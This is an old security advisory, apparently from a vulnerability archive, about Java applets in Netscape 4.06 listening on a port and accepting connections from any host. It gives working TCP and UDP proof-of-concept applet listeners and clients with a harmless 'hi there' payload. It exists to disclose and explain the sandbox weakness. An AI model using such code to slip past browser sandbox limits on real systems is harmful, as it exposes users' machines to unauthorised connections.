COMMAND
java
SYSTEMS AFFECTED
java enabled systems
PROBLEM
Tim Wright and alx@acm.org explored the "security hole" in Java
where an applet can listen on a port, and accept connections from
any machine, rather than just the machine from which the applet
was down-loaded. The server and client code they used follows.
It was tested in Netscape 4.06 for WindowsNT. It is important to
notice that they hard coded the machine which the applet would run
into the client.
// the applet server - listens on the socket
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;
/**
* This type was created in VisualAge.
*/
public class SocketListener extends Applet {
/**
* This method was created in VisualAge.
*/
public void init() {
ServerSocket ss;
try {
ss = new ServerSocket(7000);
} catch (IOException ioe) {
System.err.println("error, cannot create socket");
return;
}
System.err.println("created server socket");
while (true) {
try {
System.err.println("waiting for connection");
Socket s = ss.accept();
System.err.println("accepted connection from "+s.getInetAddress());
DataInputStream pr = new DataInputStream(s.getInputStream());
System.err.println("read:"+ pr.readLine());
pr.close();
} catch (IOException ioe) {
}
}
}
}
// the applet client - connects to the socket
import java.net.*;
import java.io.*;
public class SocketConnector {
public SocketConnector() {
super();
}
public static void main(java.lang.String[] args) {
try {
Socket s=new Socket("stl.qucis.queensu.ca",7000);
PrintWriter dot=new PrintWriter(s.getOutputStream());
dot.print("hi there");
s.close();
}
catch (Exception e) {
System.err.println("exception occured");
e.printStackTrace();
}
}
}
That's with connection-oriented sockets. What about UDP sockets?
UDP sockets throw an IOException rather than a SecurityExecption,
but they do exhibit correct behaviour in that incoming packets
from unauthorized places are not accepted. Code is below:
// Server code
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;
/**
* This type was created in VisualAge.
*/
public class SocketListener extends Applet {
/**
* This method was created in VisualAge.
*/
public void init() {
DatagramSocket ss;
try {
ss = new DatagramSocket(7000);
} catch (IOException ioe) {
System.err.println("error, cannot create socket");
return;
}
System.err.println("created server socket");
while (true) {
try {
System.err.println("waiting for connection");
DatagramPacket s=new DatagramPacket(" ".getBytes(),10);
ss.receive(s);
System.err.println("accepted connection from "+s.getAddress());
System.err.println("read:"+ s.getData());
} catch (IOException ioe) {
System.err.println("IO exception thrown");
}
}
}
}
// Client Code
import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.*;
/**
* This type was created in VisualAge.
*/
public class SocketConnector {
public SocketConnector() {
super();
}
public static void main(java.lang.String[] args) {
try {
String message="hi there";
DatagramPacket dp=new
DatagramPacket(message.getBytes(),message.length());
dp.setPort(7000);
dp.setAddress(InetAddress.getAllByName(args[0])[0]);
(new DatagramSocket()).send(dp);
}
catch (Exception e) {
System.err.println("exception occured");
e.printStackTrace();
}
}
}
SOLUTION
Readers interested in what Java code can and cannot do from a
security perspective should see:
http://www.securingjava.com
Data point: the new Java 2 security model makes no distinction
between applets and applications. The ability for Java code
to open a socket connection can be changed at the discression
of the VM's security policy manager.